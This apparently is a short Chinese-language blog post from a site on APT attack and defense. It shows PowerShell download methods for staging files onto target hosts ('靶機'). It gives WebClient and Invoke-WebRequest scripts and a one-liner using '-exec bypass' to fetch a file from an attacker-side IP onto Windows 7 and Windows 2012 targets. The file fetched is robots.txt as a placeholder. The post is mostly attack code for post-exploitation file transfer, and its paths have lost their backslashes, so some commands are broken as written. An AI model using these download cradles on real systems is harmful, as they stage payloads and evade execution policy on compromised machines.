專注APT攻擊與防御
https://micropoor.blogspot.com/
自Windows7以后內(nèi)置了powershell,如Windows 7中內(nèi)置了PowerShell2.0, Windows 8中內(nèi)置了PowerShell3.0。
靶機(jī):windows 7
powershell $PSVersionTable
down.ps1:
基于System.Net.WebClient
附:
$Urls = @()
$Urls += "http://192.168.1.115/robots.txt"
$OutPath = "E:PDF"
ForEach ( $item in $Urls) {
$file = $OutPath + ($item).split('/')[-1]
(New-Object System.Net.WebClient).DownloadFile($item, $file)
}
靶機(jī):windows 2012
powershell $PSVersionTable
down.ps1:
在powershell 3.0以后,提供wget功能,既Invoke-WebRequest
C:inetpub>powershell C:inetpubdown.ps1
注:需要絕對(duì)路徑。
附:
$url = "http://192.168.1.115/robots.txt"
$output = "C:inetpubrobots.txt"
$start_time = Get-Date
Invoke-WebRequest -Uri $url -OutFile $output
Write-Output "Time : $((Get-Date).Subtract($start_time).Seconds) second(s)"
當(dāng)然也可以一句話執(zhí)行下載:
powershell -exec bypass -c (new-object
System.Net.WebClient).DownloadFile('http://192.168.1.115/robots.txt','E:robots.txt')
Micropoor